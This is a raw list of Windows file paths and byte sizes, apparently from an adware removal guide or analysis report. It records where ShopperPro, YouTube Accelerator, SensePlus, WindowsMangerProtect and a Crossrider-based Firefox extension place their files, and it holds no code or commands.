    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp.2 (4152 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\tokyo_sprite_full[1].png (1276 bytes)
    C:\ProgramData\ShopperPro\config.json (487 bytes)
    C:\ProgramData\ShopperPro\ShopperPro.dll (2321 bytes)
    %Program Files% (x86)\ShopperPro\config.json (1254 bytes)
    %Program Files% (x86)\ShopperPro\JSDriver\jsdrv.exe (291 bytes)
    %Program Files% (x86)\ShopperPro\JSDriver\1.42.0.1766\config.json (767 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{746505DC-0E21-4667-97F8-72EA6BCF5EEF}\content\config.json (487 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{746505DC-0E21-4667-97F8-72EA6BCF5EEF}\content\database1_0_0.json (11 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{746505DC-0E21-4667-97F8-72EA6BCF5EEF}\install.rdf (828 bytes)
    %Program Files% (x86)\ShopperPro\JSDriver\1.42.0.1766\jsdrv.exe (22786 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{746505DC-0E21-4667-97F8-72EA6BCF5EEF}\content\overlay.js (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{746505DC-0E21-4667-97F8-72EA6BCF5EEF}\content\overlay.xul (203 bytes)
    %Program Files% (x86)\ShopperPro\JSDriver\1.42.0.1766\jsdrv.sys (52 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{746505DC-0E21-4667-97F8-72EA6BCF5EEF}\content\shopperpro_128.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{746505DC-0E21-4667-97F8-72EA6BCF5EEF}\chrome.manifest (113 bytes)
    C:\ProgramData\ShopperPro\database1_0_0.ej (14 bytes)
    C:\ProgramData\ShopperPro\ShopperPro64.dll (3361 bytes)
    %Program Files% (x86)\ShopperPro\JSDriver\1.42.0.1766\database1_0_0.ej (14 bytes)
    C:\ProgramData\WindowsMangerProtect\update\conf (5 bytes)
    C:\Windows\Temp\SBCA9D9.tmp (51193 bytes)
    C:\Windows\Temp\SBC9A5B.tmp (98 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\engine_3848_YouTubeAcceleratorService.log (246445 bytes)
    C:\Windows\Temp\SBCA5A4.tmp (44 bytes)
    %Program Files% (x86)\YouTube Accelerator\helper.dll (200 bytes)
    C:\Windows\Temp\SBCA267.tmp (44 bytes)
    C:\Windows\Temp\SBCA48A.tmp (98 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\config.xml (6731 bytes)
    C:\Windows\Temp\SBCDAAA.tmp (547 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\YouTubeAcceleratorService_3848.log (787 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\va_conf.dat (706 bytes)
    C:\ProgramData\TEMP:56E2E879 (240 bytes)
    C:\Windows\Temp\SBC9F22.tmp (547 bytes)
    %Program Files% (x86)\YouTube Accelerator\engine.dll (146 bytes)
    %Program Files% (x86)\YouTube Accelerator\ipc.dll (286 bytes)
    %Program Files% (x86)\YouTube Accelerator\xmldb.dll (192 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\nsExec.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31E9.tmp (25302 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\7za.exe (20181 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\[RANDOM_STRING].7z (8560 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\install20087.exe (200 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\dogolylzg.dll (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\sfseclo.dll (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\novufxv.dll (14 bytes)
    %Program Files% (x86)\SensePlus\19fa6da2-7e70-4168-ae8d-59d51e43be31-5.exe (7433 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\rblyvufer.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\System.dll (808 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\163912 (94253 bytes)
    %Program Files% (x86)\SensePlus\19fa6da2-7e70-4168-ae8d-59d51e43be31-4.exe (9654 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\gpuiqgk.dll (13 bytes)
    %Program Files% (x86)\SensePlus\utils.exe (80855 bytes)
    %Program Files% (x86)\SensePlus\19fa6da2-7e70-4168-ae8d-59d51e43be31.xpi (2321 bytes)
    C:\Windows\Tasks\19fa6da2-7e70-4168-ae8d-59d51e43be31-5_user.job (74 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\tyhdzuw.dll (3730 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\449656 (3389 bytes)
    C:\Windows\Tasks\19fa6da2-7e70-4168-ae8d-59d51e43be31-5.job (74 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\19fa6da2-7e70-4168-ae8d-59d51e43be31-4.dll (49631 bytes)
    %Program Files% (x86)\SensePlus\Uninstall.exe (601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\installer.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\ghcrjjq.dll (31236 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCABE.tmp (599749 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\ipgeoapi_com[1].json (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\wwrumuo.dll (30 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD9E5.tmp (1 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\engine_3848_YouTubeAcceleratorService.log_tmp (48 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD708.tmp (1 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\trial_now_accelerating.mht (30 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\SMALLTEST[1].htm (70 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD627.tmp (50 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\premium_video_accelerator.mht (38 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\dl_update.mht (30 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\va_off.mht (22 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD606.tmp (682 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD9D4.tmp (1 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\itunesmessage.mht (22 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\silenttestsucceeded.mht (22 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD64B.tmp (1 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\now_accelerating.mht (30 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD796.tmp (1 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\hd_disabled.mht (22 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\YouTubeAccelerator_2288.log (78482 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD982.tmp (1 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\video_accelerator.mht (38 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\exiting.mht (22 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\engine_4312_testlsp.log_tmp (22 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\silenttestfailed.mht (22 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\premium_now_accelerating.mht (30 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\oem_video_accelerator.mht (38 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\blank.html (97 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\YouTubeAccelerator_2288.log_tmp (14 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\trial_video_accelerator.mht (38 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\helper_4312_testlsp.log_tmp (151 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\update.mht (31 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\testlsp_4312.log_tmp (825 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\test.mht (22 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD639.tmp (1 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\LspCommTest.zip (178944 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\activation_offline.mht (22 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\noupdates.mht (30 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD8D0.tmp (242 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\ipc_4312_testlsp.log_tmp (999 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\trialexp_video_accelerator.mht (38 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD970.tmp (50 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\va_on.mht (22 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\YouTubeAcceleratorService_3848.log_tmp (591 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\olddriver.mht (22 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\tweetmessage.mht (22 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\activation_expired.mht (22 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\restart.mht (22 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD9C2.tmp (1 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\acceleration_not_supported.mht (22 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD2F8.tmp (242 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD93F.tmp (682 bytes)
    C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\engine_1064_DCytaiesmt_smtyc_setup.log_tmp (3 bytes)
    C:\Users\Public\Documents\ShopperPro\JsDriver\Config.xml (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\WU77T6AT.txt (136 bytes)
    C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe (3568 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\ede79d5503f43d1b03df92e314e15609.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\32284aebffd1790c1af676ef22740ce5.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\354.js (5118 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\browser.xul (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\dialog.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\64.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\1ed696713cb385de94f9ad390d934449.js (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\011a7eceebbcaea9dbfadd01c13eb2c4.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\userCode\extension.js (31 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\182.js (30 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\644e97ce391c93f6995ef050eb225474.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\panelarrow-up.png (921 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\background.html (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\177.js (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\f6183e248f78c800cbdfa526ab0ba72c.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\16.js (804 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\9486f296f7dae2528277c439e3027a17.js (357 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\253.js (741 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\28.js (506 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon48.png (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\419197bd416002adc9482518113c154c.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\ca13f04cc2c7a348e3822e7a3b984ef9.js (804 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\55b6e594d9a65c5813055e2c7a9e8e9b.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\defaults\preferences\prefs.js (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\72.js (1601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\246.js (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\9.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\180.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\be2e56a5a3ee6d636c5685892d7d480e.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\userCode\background.js (433 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\5279ca410382aa56128d34e782f9e4a4.js (20 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\4.js (3410 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\21.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\manifest.xml (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\7ff370df4fefd7ec8f92c495d67b68ae.js (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\1.js (22 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\a5077b4f6a3a26be31c44e6b60cf1917.js (804 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\63a4389a5f78644a1ccf4fb4bbf8dbf9.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\69f994bab5f48373ad13b4965111f6fe.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon24.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\376.js (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\fe20840082702bf2101a1456258e419b.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\195.js (414 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\345.js (663 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\102.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\options.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button2.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\4a54df600e32863fa3ca6e327297891e.js (26 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\skin.css (899 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button1.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\98.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\18b0782717c0a7ce62a11e043d2a8759.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\183.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\d2631eb9a769a3fbb2daac52c09fbf61.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\aaf9780bed6a32289445678dd9507bea.js (21 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome.manifest (622 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\e4b09a3d09de28e2f8cec8a93ef85ea8.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\54e21ad6046a6abadafa67ad23673daf.js (22 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\f81f1afa5beefc45d6b53c5c7482ffda.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button3.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\1f2ded915cc3524f789dd42de02b8665.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\22.js (21 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\c60be51da85db7f8f469322182677351.js (134 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\47.js (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\1adfac8870bf8f5c6f07033cc6c119d1.js (28 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\242.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\installer.js (10 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\search_dialog.xul (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\install.rdf (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon128.png (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins.json (22 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\4f13fb5d8cac4f57cbf5e6b64e4bc4e3.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\14.js (808 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\f68f5b6e3809b8233025ed6dcab5c45a.js (22 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\7.js (689 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\385.js (805 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon16.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\391.js (801 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\68f01be757cbefe2878c12b87d9f7f9a.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\locale\en-US\translations.dtd (429 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\200.js (813 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\184.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\223.js (829 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\a61368b495e897aad729e6b095caafd1.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\a5aff4a160320a52a862ffa7da301bf5.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\crossrider_statusbar.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\17.js (2473 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\0168d4d33d6df27732eb8b5699128025.js (6 bytes)
